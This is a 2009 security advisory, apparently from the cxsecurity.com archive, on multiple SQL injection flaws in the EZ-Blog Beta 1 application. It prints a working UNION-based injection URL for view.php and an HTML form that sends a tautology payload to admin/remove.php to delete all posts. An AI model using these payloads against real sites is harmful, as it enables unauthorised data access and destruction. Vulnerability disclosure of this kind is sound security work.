EZ-Blog Beta 1 Multiple SQL Injection

2009-03-02 / 2009-03-03
Credit: drosophila
Risk: Medium
Local: No
Remote: Yes

******* Salvatore "drosophila" Fresta ******* Application: EZ-Blog http://sourceforge.net/projects/ez-blog/ Version: Beta 1 Bug: * Multiple SQL Injection Exploitation: Remote Date: 1 Mar 2009 Discovered by: Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta e-mail: drosophilaxxx_at_gmail&#46;com ************************************************* - BUGS SQL Injection: Requisites: magic_quotes_gpc = off This is a crazy application because it not require authentication for posting, deleting, etc. and it is entirely vulnerable to SQL Injection, as follows: http://site/path/public/view.php?storyid=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10%23 There aren't hight reserved information on the database, but it is possible to cause inconvenience. The following injection allow to delete all posts: <form action="http://site/path/admin/remove.php" method="POST"> <input type="hidden" name="kill" value="1'or'1'='1"> <input type="hidden" name="confirm" value="1"> <input type="hidden" name="rm" value="true"> <input type="submit" value="Exploit"> </form> ************************************************* <pre>-- Salvatore "drosophila" FrestaCWNP444351</pre>

Referencje:

http://xforce.iss.net/xforce/xfdb/49013
http://www.securityfocus.com/bid/33947
http://www.securityfocus.com/archive/1/archive/1/501352/100/0/threaded
http://www.milw0rm.com/exploits/8128


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top